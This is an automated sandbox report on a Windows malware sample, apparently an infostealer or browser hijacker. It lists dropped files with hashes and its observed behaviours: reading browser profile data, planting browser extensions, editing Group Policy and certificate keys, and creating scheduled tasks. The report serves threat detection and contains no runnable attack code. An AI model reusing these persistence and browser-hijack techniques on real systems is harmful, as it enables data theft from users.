SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 8c42e38daa3967c0dbd1a7c997277337
SHA1 6ca32c442c87b1fdb51695f309ab85e0a8b7ac4b
SHA256 c83e699501fa76008a08daef520d2f8ee69ee9b1934b67c088637ee175ad6546
SHA512 237957f1cb063b22eeb6aa84eaa81dab617d28c35e7ea7ca40c45334d7982edec78c4a87fa16f0a2921f7cbf0267fdcc29a249df97b925f62c1df36fb691f899

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Program Files (x86)\qBvbbKpBU\tdfVGAH.xml

MD5 75dcfea47225562a856f85a72b459d99
SHA1 f505682d1fb881615a285458d96b64436a14a4d2
SHA256 d39d60d305fe9169a8434ee0a8ecc5f7cf8be1394020d27af26aefe3792d8e37
SHA512 e361bb3cd4eebd2dfee89cc643fa3ffaf57b049199eb6c5fc41bbd6f763fb23da110f2d1b827309d25114b574334718e5388a0de5f8702c683c541aa172747bb

C:\Program Files (x86)\fZHZowTYSgfU2\aJtOsWq.xml

MD5 f1a2e37bc9905658fc013ce649d0ef53
SHA1 3e2f7d0f29557789dcc39f752cc46f8cd83ac0da
SHA256 82516740dc038da91b6d20931346cf2e330fe1323fcc0f71d0f46f44978f2a70
SHA512 dbeadaa70e83060a87e9b0eadd79a7fa5df67c2b1fde840765a5bc77308b311a9f9f347396dad7acb3620a5aa395ad7eff8cd2fd3ead5745b6c62d030c6fabba

C:\ProgramData\nxeoDZreGracWIVB\WFVdaTI.xml

MD5 f3bdb727e58226a8ed56b936e800817e
SHA1 146c795e27dc59be68271f06e489e9fc70daf93e
SHA256 5f5bf0b34c0bf23d287dd95aff5651e1df7a5187d1f545daa1c57c5bcd4e356b
SHA512 6c38dfc6d7b0bfa1e14698d41b3fa7e26e00a4265fcaba0701b9b73376877f3d3df00fd9da6dd5a6d646f500f990068b9783b7bcc507de27fb5a3b3793522cc5

C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\DXIODRJ.xml

MD5 b5faed27d8f4b66cba8b7424ded6c38b
SHA1 86fcc23a43acd06a5b146dfaa240cbda0bcb8513
SHA256 3b4d39c4c51bba7a5921c157b9d7b8aba61d35b233f019d9a77bd69ac15ea5f1
SHA512 4f3a75d7cd97ce857e6e5be907595ce468b4d1a0fe0e19a8947c15ecaf5283995da13427b274c6f6fbfc25ca943e019cdb52aa2a0734208e9a31e0aaba465fb7

C:\Program Files (x86)\epUZFeichsCPC\jafxhIg.xml

MD5 dc9628fa8c89bb74b87823a3d54fc3f7
SHA1 a1fd5eddb0abca012155d2bddd20b0fcc6769421
SHA256 b07236dd4f9e9bb8b290da3d4e94035424b8d659330922b6a717b3b7f721d0ea
SHA512 25867526fb973cd8b23d739956bac809c99ad743f783b51a78898388fffd40da79755fc348822c7065f7f3646f861f844451f0af3aaee7e7da56042dcd190b30

C:\Windows\Temp\JHEwijpMlSQrgvQB\ZCDJPBcy\qOGTqyv.dll

MD5 44f3948cb32c3b8df1fca5ef30116aa0
SHA1 c674b72e1e1058d0e29d555abc09d40f0c7c8a0c
SHA256 12cd48a7e59081b04ad77863bdfc946ecaeccede9368f6410e05c80ee526a0fe
SHA512 09d5de6251c88e853132bc8455f2da4d4922a9059778c5103652da3420cd7f98de983f6e3e9ebbe201bd520ac6dbff4cc95b7f01cf6ea335b05671f99649b5b0

memory/3148-510-0x00000000034C0000-0x000000000354A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\92qyi9k9.default-release\prefs.js

MD5 4e7831d2b9b650b8b84782e91e021fe1
SHA1 a384846d2bbabe9f29540fd0bfe5b1b05cdf213b
SHA256 91b821a6fcd77f784f6a67e0d6338fb7e56fbe7bf8f9ca4c61474fad2ab28c23
SHA512 9c6e84d3873e5c9e6d7f25be6afe997b59ffb3ec39844bfd687cbabebec224ef96f80a62c4a8eb92d2e03e9c0373fc6bb63ad3b54ed6318b8e2b699430ed6ac5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 001a39e0c21b36d6e41f4880c1cb3f4e
SHA1 acf3ecdda6b252e444c936cddc759ebb03dddbb0
SHA256 18120d3d844ee80ea5d7272f3700cfc0e52671b09fe9c059dcd3506bdeddfd90
SHA512 899cc5b718f3e755b5d1d5a28c2e5c934b905260f2296f4c82b086efc92a9582fb3b7961ec0761965661dfd05cfb1d893cb1fafc0ed362ef81d45e1cb90c6e80

memory/3148-525-0x0000000003710000-0x00000000037F2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 5a22016190d31ef84b7838347508d724
SHA1 eb1cb8f1ea94e866e9f3670f15f01a8c0ec504f3
SHA256 29ceab1c9e6173b8c01d4be4c9d07b50e91c6ce8fcc44739bf0999dd8e591009
SHA512 a5714c1b8d5ee6898d1709aa73c602b1bd323cb293ed8c3ca8462af2d8cb3f89afd81cab567048e359f894372ce5591f4fa588cbfa65c378716171ab8b62231c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 6568eaddc24877e8adccaceef783774f
SHA1 13055ae3ee7d7c5c6555462c5b8c1ddfc262effb
SHA256 2c801e61a0ef72828b905684ecf202589071c93ded9e88b7da81f3c496d7eb0b
SHA512 91e94ae021496cecc4e156e837e244530017630ddc9d0b4a374b24ef53e262b15ece51008ed59732b1103696ac5c466ac741c26ffb0863b638a463a12a30ba6c

memory/1032-528-0x00000000013B0000-0x0000000005EFC000-memory.dmp

memory/4076-582-0x0000000000390000-0x0000000000A4A000-memory.dmp

memory/3148-597-0x00000000009B0000-0x000000000106A000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-06 05:01

Reported

2024-04-06 05:03

Platform

win11-20240214-en

Max time kernel

142s

Max time network

146s

Command Line

"C:\Users\Admin\AppData\Local\Temp\106d883758255a2ad087a5134b44276918cbe55d1082864a561c76644891d035.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS6A62.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\OjCHFYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\OjCHFYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File created C:\Program Files (x86)\fZHZowTYSgfU2\ZkwLVLebrZrHT.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File created C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\XvHXZAA.xml C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File created C:\Program Files (x86)\epUZFeichsCPC\GlGomVo.xml C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File created C:\Program Files (x86)\VDiAXGzPiWUn\QOJPtoV.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File created C:\Program Files (x86)\qBvbbKpBU\DEqklWO.xml C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File created C:\Program Files (x86)\qBvbbKpBU\kLLbZH.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File created C:\Program Files (x86)\fZHZowTYSgfU2\BaSMZgS.xml C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File created C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\yigOzsN.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File created C:\Program Files (x86)\epUZFeichsCPC\eAjNchS.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\MWViHNuTpmRlpInKg.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\wbeMFPOaxEodGIM.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\BinjFlxHFUMMGNOij.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\bpJjqbWMDOjxkYrvBb.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS6A62.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS6A62.tmp\Install.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{0bf74aa2-0000-0000-0000-d01200000000} C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
